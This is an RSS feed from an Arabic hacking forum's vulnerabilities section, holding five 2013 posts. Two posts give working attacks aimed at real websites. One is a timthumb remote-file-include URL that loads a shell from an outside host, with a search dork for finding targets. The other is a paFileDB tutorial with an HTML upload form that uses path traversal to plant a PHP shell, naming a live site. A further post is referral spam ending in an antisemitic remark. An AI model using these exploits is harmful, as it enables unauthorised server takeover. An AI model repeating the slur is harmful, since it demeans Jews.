<?xml version="1.0" encoding="UTF-8"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>منتديات جيوش الهكرز - قسم الثغرات</title>
		<link>http://www.aljyyosh.com/vb/</link>
		<description>هذا القسم يعالج الثغرات بجميع أنواعها ويحوي شروحات عن كيفية أكتشاف الثغرات وأستغلالها</description>
		<language>ar</language>
		<lastBuildDate>Wed, 22 May 2013 21:16:33 GMT</lastBuildDate>
		<generator>vBulletin</generator>
		<ttl>60</ttl>
		<image>
			<url>http://www.aljyyosh.com/vb/blackgreen/misc/rss.png</url>
			<title>منتديات جيوش الهكرز - قسم الثغرات</title>
			<link>http://www.aljyyosh.com/vb/</link>
		</image>
		<item>
			<title>remote file include</title>
			<link>http://www.aljyyosh.com/vb/showthread.php?t=47934&amp;goto=newpost</link>
			<pubDate>Wed, 15 May 2013 08:11:50 GMT</pubDate>
			<description><![CDATA[السلام عليكم و رحمة الله و براكاته 
 
 
 
 
remote file include 
 
"timthumb.php" 
 
دروك :- inurl:"wp-content/plugins/highlighter/libs/timthumb.php"]]></description>
			<content:encoded><![CDATA[<div><div style="text-align: center;"><font size="7"><font color="#00FFFF">السلام عليكم و رحمة الله و براكاته</font></font><br />
<br />
<br />
<br />
<font size="4"><font color="#00FFFF"><br />
remote file include<br />
<br />
&quot;timthumb.php&quot;<br />
<br />
دروك :- inurl:&quot;wp-content/plugins/highlighter/libs/timthumb.php&quot;<br />
<br />
استغلال :- wp-content/plugins/highlighter/libs/timthumb.php?src=http://site.com/shell.txt<br />
<br />
استعراض :- wp-content/plugins/highlighter/libs/temp/shell <br />
<br />
<br />
<font size="6">تحياتي للجميع </font><br />
</font></font></div></div>

]]></content:encoded>
			<category domain="http://www.aljyyosh.com/vb/forumdisplay.php?f=35">قسم الثغرات</category>
			<dc:creator>الجليد المشتعل</dc:creator>
			<guid isPermaLink="true">http://www.aljyyosh.com/vb/showthread.php?t=47934</guid>
		</item>
		<item>
			<title>الثغرات وانواعها تفضل يا مبتدأ</title>
			<link>http://www.aljyyosh.com/vb/showthread.php?t=47933&amp;goto=newpost</link>
			<pubDate>Wed, 15 May 2013 04:39:28 GMT</pubDate>
			<description>السلام عليكم ورحمة الله وبركاته  
 
قد يبدو الموضوع مكرر ولكن تم تكراره بسبب اهميته  
 
الكثير من المبتدئين يسأل عن الثغرات ويدخل مواضيع مثلا اختراق...</description>
			<content:encoded><![CDATA[<div><div style="text-align: center;"><font size="3"><span style="font-family: Arial Black">السلام عليكم ورحمة الله وبركاته <br />
<br />
قد يبدو الموضوع مكرر ولكن تم تكراره بسبب اهميته <br />
<br />
الكثير من المبتدئين يسأل عن الثغرات ويدخل مواضيع مثلا اختراق بواسطة ثغرا كذا ولا يفهم شي<br />
<br />
ادخل الى الرابط وستعرف الثغرات انشاء الله لا تتردد في أسئلتك <br />
<br />
<a href="http://macbook3arabi.blogspot.com/2013/05/blog-post_12.html" target="_blank" rel="nofollow">http://macbook3arabi.blogspot.com/20...g-post_12.html</a><br />
<br />
شكرا جزيلا </span></font></div></div>

]]></content:encoded>
			<category domain="http://www.aljyyosh.com/vb/forumdisplay.php?f=35">قسم الثغرات</category>
			<dc:creator>Omar hcj</dc:creator>
			<guid isPermaLink="true">http://www.aljyyosh.com/vb/showthread.php?t=47933</guid>
		</item>
		<item>
			<title>CiviCRM for Joomla 4.2.2 - Remote Code Injection</title>
			<link>http://www.aljyyosh.com/vb/showthread.php?t=47413&amp;goto=newpost</link>
			<pubDate>Fri, 26 Apr 2013 02:15:04 GMT</pubDate>
			<description>PHP: 
---------- 
http://www.exploit-db.com/exploits/24969/ 
----------</description>
			<content:encoded><![CDATA[<div><div class="bbcode_container">
	<div class="bbcode_description">كود PHP:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">http</span><span style="color: #007700">:</span><span style="color: #FF8000">//www.exploit-db.com/exploits/24969/&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div></div>

]]></content:encoded>
			<category domain="http://www.aljyyosh.com/vb/forumdisplay.php?f=35">قسم الثغرات</category>
			<dc:creator>موآدع</dc:creator>
			<guid isPermaLink="true">http://www.aljyyosh.com/vb/showthread.php?t=47413</guid>
		</item>
		<item>
			<title>اختراق سيرفر كام بثغرة بسيطة جدا</title>
			<link>http://www.aljyyosh.com/vb/showthread.php?t=47390&amp;goto=newpost</link>
			<pubDate>Thu, 25 Apr 2013 12:34:17 GMT</pubDate>
			<description>بسم الله الرحمن الرحيم 
 
شرح ثغرة 
PHP Arena paFileDB 
وأستغلالها. 
============ 
الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على...</description>
			<content:encoded><![CDATA[<div><div style="text-align: center;"><font size="4"><font color="#ADD8E6"><br />
بسم الله الرحمن الرحيم<br />
<br />
شرح ثغرة<br />
PHP Arena paFileDB<br />
وأستغلالها.<br />
============<br />
الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على الموقع وأختراق السيرفر بالكامل.<br />
============<br />
(البرامج المصابه)<br />
PHP Arena paFileDB 1.1.3<br />
PHP Arena paFileDB 2.1.1<br />
PHP Arena paFileDB 3.0 Beta 3.1<br />
PHP Arena paFileDB 3.0<br />
PHP Arena paFileDB 3.1<br />
============<br />
أذهب إلى أي محرك بحث منثل جوجل<br />
وأكتب أيا من البرامج السابقة مثلا:<br />
PHP Arena paFileDB 3.1<br />
راح تطلع لنا مواقع كثيرة نختار منها على سبيل المثال:<br />
<a href="http://www.truez.com/download" target="_blank" rel="nofollow">http://www.truez.com/download</a><br />
نضيف عليه هالوصلة:<br />
includes/team/file.php<br />
ليصبح:<br />
<a href="http://www.truez.com/download/includes/team/file.php" target="_blank" rel="nofollow">http://www.truez.com/download/includes/team/file.php</a><br />
الأن ضع اللنك في المتصفح وأضغط أنتر:<br />
إذا طلع لك هكذا<br />
[ ] - [ ] - [ ]<br />
يعني الموقع مصاب بالثغرة.<br />
الأن لرفع ملف إلى الموقع نتبع الخطوات التالية:<br />
1- نعمل مجلد على القرص C: ونسميه مثلا: Virus<br />
2- الأن نضع بداخله الملف المراد نقله على الموقع ونسميه مثلا 777.php<br />
3- الأن ننسخ هذا الكود ونضعه بملف txt ثم عند الحفظ نسميه Virus.html:<br />
======================<br />
&lt;html&gt;&lt;body&gt;<br />
&lt;form ENCTYPE=&quot;multipart/form-data&quot; method=&quot;POST&quot; action=&quot;http://www.truez.com/download/includes/team/file.php&quot;&gt;<br />
&lt;input name=&quot;userfile&quot; TYPE=&quot;file&quot;&gt;&lt;br&gt;<br />
&lt;input name=&quot;userfile_name&quot; TYPE=&quot;text&quot; value=&quot;../../../uploads/777.php&quot;&gt;&lt;br&gt;<br />
&lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;team&quot;&gt;<br />
&lt;input type=&quot;hidden&quot; name=&quot;tm&quot; value=&quot;file&quot;&gt;<br />
&lt;input type=&quot;hidden&quot; name=&quot;file&quot; value=&quot;upload&quot;&gt;<br />
&lt;input type=&quot;hidden&quot; name=&quot;upload&quot; value=&quot;do&quot;&gt;<br />
&lt;input type=submit name=submit value=&quot;doit&quot;&gt;<br />
&lt;/form&gt;<br />
&lt;/body&gt;&lt;/html&gt;<br />
======================<br />
مع مراعاة تغيير:<br />
<a href="http://www.truez.com/download/includes/team/file.php" target="_blank" rel="nofollow">http://www.truez.com/download/includes/team/file.php</a><br />
إلى الموقع المصاب.<br />
و<br />
777.php<br />
إلى إسم الملف (أتركه كما هو لأنه نحن غيرنا أسمه إلى (777<br />
4- الأن أفتح الصفحة بالمستعرض Internet Explorer وفي الفراغ الأول أختار الملف 777.php الذي كنا نريد ترفيعه ثم أضغط على doit عندها سينتقل الملف إلى الموقع عن طريق الثغرة.<br />
ويمكننا أستعراضه من هذا اللنك:<br />
<a href="http://www.truez.com/download/uploads/777.php" target="_blank" rel="nofollow">http://www.truez.com/download/uploads/777.php</a><br />
<br />
</font></font></div></div>

]]></content:encoded>
			<category domain="http://www.aljyyosh.com/vb/forumdisplay.php?f=35">قسم الثغرات</category>
			<dc:creator>xsalmanx</dc:creator>
			<guid isPermaLink="true">http://www.aljyyosh.com/vb/showthread.php?t=47390</guid>
		</item>
		<item>
			<title>منقول:دعك من الكليك و أربح 3يورو في 3 أيام</title>
			<link>http://www.aljyyosh.com/vb/showthread.php?t=47361&amp;goto=newpost</link>
			<pubDate>Wed, 24 Apr 2013 12:14:53 GMT</pubDate>
			<description>رابط الموقع ; 
http://www.fanslave.net/ref.php?ref=637160 
طريقت التسجيل; 
صورة:...</description>
			<content:encoded><![CDATA[<div>رابط الموقع ;<br />
<a href="http://www.fanslave.net/ref.php?ref=637160" target="_blank" rel="nofollow">http://www.fanslave.net/ref.php?ref=637160</a><br />
طريقت التسجيل;<br />
<img src="http://3.bp.blogspot.com/-gDIfOHJYNGk/UCEmTmq82qI/AAAAAAAAAS0/Ye4fQzGa62E/s1600/1.jpg" border="0" alt="" /><br />
<img src="http://3.bp.blogspot.com/-uPqO1l03-mU/UCEmUsZAe5I/AAAAAAAAAS4/kXSJIeTVgUc/s1600/2.jpg" border="0" alt="" /><br />
بعد اتمام التسجيل قم بتسجيل الدخول, ثم ستجد في الصفحة الرئيسية للحساب هذا الزر<br />
<img src="http://2.bp.blogspot.com/-e0Ooxpsf7CA/UCEmxGcHrhI/AAAAAAAAATE/yFXT8ElGV8A/s1600/3.png" border="0" alt="" /><br />
<img src="http://1.bp.blogspot.com/-noQdby_0Ce4/UCEnARUJjFI/AAAAAAAAATM/4i85b8Ry85I/s1600/4.png" border="0" alt="" /><br />
<img src="http://4.bp.blogspot.com/-z_bqM-babFE/UCEnBFR1UiI/AAAAAAAAATQ/1hSvSgkrPqI/s1600/5.png" border="0" alt="" /><br />
<img src="http://1.bp.blogspot.com/-vm8jXoRAgFY/UCEoRYeShcI/AAAAAAAAATc/4EuqoblxtyU/s1600/6.jpg" border="0" alt="" /><br />
االصفحات التي ستظهر و تسجل إعجابك فيها<br />
<img src="http://3.bp.blogspot.com/-NXYR71h-RGE/UCEopIaRajI/AAAAAAAAATk/KAK1kmO1Uis/s1600/7.jpg" border="0" alt="" /><br />
<img src="http://3.bp.blogspot.com/-WOIdEQh1T40/UCEpCPJAt3I/AAAAAAAAAT0/PW1bzbbLh7o/s1600/9.jpg" border="0" alt="" /><br />
الحد الأدنى للسحب هو 15 يورو<br />
<img src="http://3.bp.blogspot.com/-YeSv3kZDJ5U/UCEqDev6TTI/AAAAAAAAAUY/i2dH5v3qp_0/s1600/14.jpg" border="0" alt="" /><br />
سيحولك الموقع الى صفحة السحب اكتب حسابك على Payza او Paypal<br />
<br />
 التذكير برابط الموقع<br />
<a href="http://www.fanslave.net/ref.php?ref=637160" target="_blank" rel="nofollow">http://www.fanslave.net/ref.php?ref=637160</a><br />
<img src="http://www.shy22.com/upfiljpg/wkc52472.jpg" border="0" alt="" /><br />
للإشارة إن لم تتسجل على طريقي <br />
وتسجلت لوحدك فسوف يتم ربح عميل أخر يمكن أن يكون يهودي ...<br />
وأتمنى من الإدارة عدم الحذف</div>

]]></content:encoded>
			<category domain="http://www.aljyyosh.com/vb/forumdisplay.php?f=35">قسم الثغرات</category>
			<dc:creator>salahuiste</dc:creator>
			<guid isPermaLink="true">http://www.aljyyosh.com/vb/showthread.php?t=47361</guid>
		</item>
	</channel>
</rss>
